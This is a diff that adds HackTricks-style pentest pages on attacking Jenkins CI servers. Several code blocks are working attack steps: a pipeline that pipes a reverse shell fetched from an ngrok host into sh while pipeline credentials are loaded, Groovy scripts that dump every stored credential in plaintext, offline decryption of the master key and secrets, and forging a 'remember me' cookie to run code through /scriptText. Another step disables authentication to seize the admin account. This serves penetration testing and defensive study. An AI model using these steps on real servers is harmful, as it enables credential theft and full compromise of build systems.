+[basic-jenkins-information.md](basic-jenkins-information.md)
+{% endcontent-ref %}
+
+Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job/<project-name>/configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines.
+
+There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**:
+
+```
+ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected
+```
+
+Here you have the way to load some common secret types:
+
+```bash
+withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
+    sh '''
+        env #Search for USERNAME and PASS
+    '''
+}
+
+withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
+    sh '''
+        env #Search for SECRET
+    '''                 
+}
+
+withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
+    sh '''
+        env # Search for USERPASS
+    '''
+}
+
+# You can also load multiple env variables at once
+withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+     sh '''
+        env
+    '''
+}
+```
+
+At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/)
+
+{% hint style="warning" %}
+The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\
+More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation).
+{% endhint %}
+
+### Triggers
+
+From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`.
+
+Cron example:
+
+```bash
+triggers { cron('H */4 * * 1-5') }
+```
+
+Check **other examples in the docs**.
+
+### Nodes & Agents
+
+A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines.
+
+For more information check the basic information:
+
+{% content-ref url="basic-jenkins-information.md" %}
+[basic-jenkins-information.md](basic-jenkins-information.md)
+{% endcontent-ref %}
+
+You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more:
+
+![](<../../.gitbook/assets/image (249).png>)
+
+It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information.
+
+To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config:
+
+```bash
+pipeline {
+    agent {label 'built-in'}
+```
+
+### Complete example
+
+Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell:
+
+```bash
+pipeline {
+    agent {label 'built-in'}
+    triggers { cron('H */4 * * 1-5') }
+    environment {
+        GENERIC_ENV_VAR = "Test pipeline ENV variables."
+    }
+
+    stages {
+        stage("Build") {
+                environment {
+                    STAGE_ENV_VAR = "Test stage ENV variables."
+                }
+                steps {
+            withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
+                     string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
+                sh '''
+                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS
+                '''
+            }
+        }
+    }
+
+    post { 
+        always { 
+            cleanWs()
+        }
+    }
+}
+```
+
+## Arbitrary File Read to RCE
+
+{% content-ref url="jenkins-arbitrary-file-read-to-rce-via-remember-me.md" %}
+[jenkins-arbitrary-file-read-to-rce-via-remember-me.md](jenkins-arbitrary-file-read-to-rce-via-remember-me.md)
+{% endcontent-ref %}
+
+## RCE
+
+{% content-ref url="jenkins-rce-with-groovy-script.md" %}
+[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
+{% endcontent-ref %}
+
+{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
+[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
+{% endcontent-ref %}
+
+{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
+[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+### Metasploit
+
+```
+msf> post/multi/gather/jenkins_gather
+```
+
+### Jenkins Secrets
+
+You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
+
+If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**.
+
+![](<../../.gitbook/assets/image (180).png>)
+
+#### From Groovy
+
+{% content-ref url="jenkins-dumping-secrets-from-groovy.md" %}
+[jenkins-dumping-secrets-from-groovy.md](jenkins-dumping-secrets-from-groovy.md)
+{% endcontent-ref %}
+
+#### From disk
+
+These files are needed to **decrypt Jenkins secrets**:
+
+* secrets/master.key
+* secrets/hudson.util.Secret
+
+Such **secrets can usually be found in**:
+
+* credentials.xml
+* jobs/.../build.xml
+* jobs/.../config.xml
+
+Here's a regex to find them:
+
+```bash
+# Find the secrets
+grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
+# Print only the filenames where the secrets are located
+grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<"
+
+# Secret example
+credentials.xml: <secret>{AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==}</secret>
+```
+
+#### Decrypt Jenkins secrets offline
+
+If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**.
+
+```bash
+python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml
+06165DF2-C047-4402-8CAB-1C8EC526C115
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
+NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT
+```
+
+#### Decrypt Jenkins secrets from Groovy
+
+```bash
+println(hudson.util.Secret.decrypt("{...}"))
+```
+
+### Create new admin user
+
+1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\`
+2. Search for the word `<useSecurity>true</useSecurity>`and change the word \*\*`true` \*\* to **`false`**.
+   1. `sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml`
+3. **Restart** the **Jenkins** server: `service jenkins restart`
+4. Now go to the Jenkins portal again and **Jenkins will not ask any credentials** this time. You navigate to "**Manage Jenkins**" to set the **administrator password again**.
+5. **Enable** the **security** again by changing settings to `<useSecurity>true</useSecurity>` and **restart the Jenkins again**.
+
+## References
+
+* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn_jenkins)
+* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/)
+* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password)
+* [https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html](https://www.lazysystemadmin.com/2018/12/quick-howto-reset-jenkins-admin-password.html)
+* [https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072](https://medium.com/cider-sec/exploiting-jenkins-build-authorization-22bf72926072)
+* [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
new file mode 100644
index 0000000000..43612a6e65
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md
@@ -0,0 +1,120 @@
+# Basic Jenkins Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Access
+
+### Username + Password
+
+The most common way to login in Jenkins if with a username or a password
+
+### Cookie
+
+If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen).
+
+### SSO/Plugins
+
+Jenkins can be configured using plugins to be **accessible via third party SSO**.
+
+### Tokens
+
+**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API.
+
+### SSH Keys
+
+This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/))
+
+## Authorization
+
+In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options:
+
+* **Anyone can do anything**: Even anonymous access can administrate the server
+* **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access.
+* **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**.
+* **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**.
+
+![](<../../.gitbook/assets/image (149).png>)
+
+* **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.**
+* **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`.
+
+## **Security Realm**
+
+In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms:
+
+* **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/).
+* **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default.
+* **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups.
+* **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization.
+
+Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
+
+* [Active Directory](https://plugins.jenkins.io/active-directory)
+* [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
+* [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
+
+## Jenkins Nodes, Agents & Executors
+
+Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
+
+**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
+
+**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
+
+An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
+
+## Jenkins Secrets
+
+### Encryption of Secrets and Credentials
+
+Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
+
+* `hudson.util.Secret`: used for generic secrets;
+* `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
+* `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+
+### Credentials Access
+
+Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job/<project-name>/configure`) and therefore only accessible from the specific project.
+
+According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
+
+**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
+
+## References
+
+* [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
+* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+* [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
+* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
+* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
+* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
+* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
new file mode 100644
index 0000000000..06ae836213
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -0,0 +1,135 @@
+# Jenkins Arbitrary File Read to RCE via "Remember Me"
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+
+This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+
+### Attack Prerequisites
+
+* **Feature Requirement:** "Remember me" must be enabled (default setting).
+* **Access Levels:** Attacker needs Overall/Read permissions.
+* **Secret Access:** Ability to read both binary and textual content from key files.
+
+### Detailed Exploitation Process
+
+#### Step 1: Data Collection
+
+**User Information Retrieval**
+
+* Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
+  * **Username**
+  * **User seed**
+  * **Timestamp**
+  * **Password hash**
+
+**Secret Key Extraction**
+
+* Extract cryptographic keys used for signing the cookie:
+  * **Secret Key:** `$JENKINS_HOME/secret.key`
+  * **Master Key:** `$JENKINS_HOME/secrets/master.key`
+  * **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+
+#### Step 2: Cookie Forging
+
+**Token Preparation**
+
+*   **Calculate Token Expiry Time:**
+
+    {% code overflow="wrap" %}
+    ```javascript
+    tokenExpiryTime = currentServerTimeInMillis() + 3600000  // Adds one hour to current time
+    ```
+    {% endcode %}
+*   **Concatenate Data for Token:**
+
+    {% code overflow="wrap" %}
+    ```javascript
+    token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+    ```
+    {% endcode %}
+
+**MAC Key Decryption**
+
+*   **Decrypt MAC Key File:**
+
+    ```javascript
+    key = toAes128Key(masterKey)  // Convert master key to AES128 key format
+    decrypted = AES.decrypt(macFile, key)  // Decrypt the .mac file
+    if not decrypted.hasSuffix("::::MAGIC::::")
+        return ERROR;
+    macKey = decrypted.withoutSuffix("::::MAGIC::::")
+    ```
+
+**Signature Computation**
+
+*   **Compute HMAC SHA256:**
+
+    ```javascript
+    mac = HmacSHA256(token, macKey)  // Compute HMAC using the token and MAC key
+    tokenSignature = bytesToHexString(mac)  // Convert the MAC to a hexadecimal string
+    ```
+
+**Cookie Encoding**
+
+*   **Generate Final Cookie:**
+
+    {% code overflow="wrap" %}
+    ```javascript
+    cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // Base64 encode the cookie data
+    ```
+    {% endcode %}
+
+#### Step 3: Code Execution
+
+**Session Authentication**
+
+* **Fetch CSRF and Session Tokens:**
+  * Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
+  * Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+
+**Command Execution Request**
+
+*   **Send a POST Request with Groovy Script:**
+
+    ```bash
+    curl -X POST "$JENKINS_URL/scriptText" \
+    --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+    --header "Jenkins-Crumb: $CRUMB" \
+    --header "Content-Type: application/x-www-form-urlencoded" \
+    --data-urlencode "script=$SCRIPT"
+    ```
+
+    * Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+
+The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
new file mode 100644
index 0000000000..1d1b94715e
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -0,0 +1,116 @@
+# Jenkins Dumping Secrets from Groovy
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+{% hint style="warning" %}
+Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
+{% endhint %}
+
+You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+
+```java
+// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
+import jenkins.model.*
+import com.cloudbees.plugins.credentials.*
+import com.cloudbees.plugins.credentials.impl.*
+import com.cloudbees.plugins.credentials.domains.*
+import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
+import org.jenkinsci.plugins.plaincredentials.StringCredentials
+import org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl
+
+def showRow = { credentialType, secretId, username = null, password = null, description = null ->
+println("${credentialType} : ".padLeft(20) + secretId?.padRight(38)+" | " +username?.padRight(20)+" | " +password?.padRight(40) + " | " +description)
+}
+
+// set Credentials domain name (null means is it global)
+domainName = null
+
+credentialsStore = Jenkins.instance.getExtensionList('com.cloudbees.plugins.credentials.SystemCredentialsProvider')[0]?.getStore()
+domain = new Domain(domainName, null, Collections.<DomainSpecification>emptyList())
+
+credentialsStore?.getCredentials(domain).each{
+if(it instanceof UsernamePasswordCredentialsImpl)
+showRow("user/password", it.id, it.username, it.password?.getPlainText(), it.description)
+else if(it instanceof BasicSSHUserPrivateKey)
+showRow("ssh priv key", it.id, it.passphrase?.getPlainText(), it.privateKeySource?.getPrivateKey()?.getPlainText(), it.description)
+else if(it instanceof StringCredentials)
+showRow("secret text", it.id, it.secret?.getPlainText(), '', it.description)
+else if(it instanceof FileCredentialsImpl)
+showRow("secret file", it.id, it.content?.text, '', it.description)
+else
+showRow("something else", it.id, '', '', '')
+}
+
+return
+```
+
+#### or this one:
+
+```java
+import java.nio.charset.StandardCharsets;
+def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
+      com.cloudbees.plugins.credentials.Credentials.class
+)
+
+for (c in creds) {
+  println(c.id)
+  if (c.properties.description) {
+    println("   description: " + c.description)
+  }
+  if (c.properties.username) {
+    println("   username: " + c.username)
+  }
+  if (c.properties.password) {
+    println("   password: " + c.password)
+  }
+  if (c.properties.passphrase) {
+    println("   passphrase: " + c.passphrase)
+  }
+  if (c.properties.secret) {
+    println("   secret: " + c.secret)
+  }
+  if (c.properties.secretBytes) {
+    println("    secretBytes: ")
+    println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+    println("")
+  }
+  if (c.properties.privateKeySource) {
+    println("   privateKey: " + c.getPrivateKey())
+  }
+  if (c.properties.apiToken) {
+    println("   apiToken: " + c.apiToken)
+  }
+  if (c.properties.token) {
+    println("   token: " + c.token)
+  }
+  println("")
+}
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
new file mode 100644
index 0000000000..34044c311a
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -0,0 +1,65 @@
+# Jenkins RCE Creating/Modifying Pipeline
+
+{% hint style="success" %}
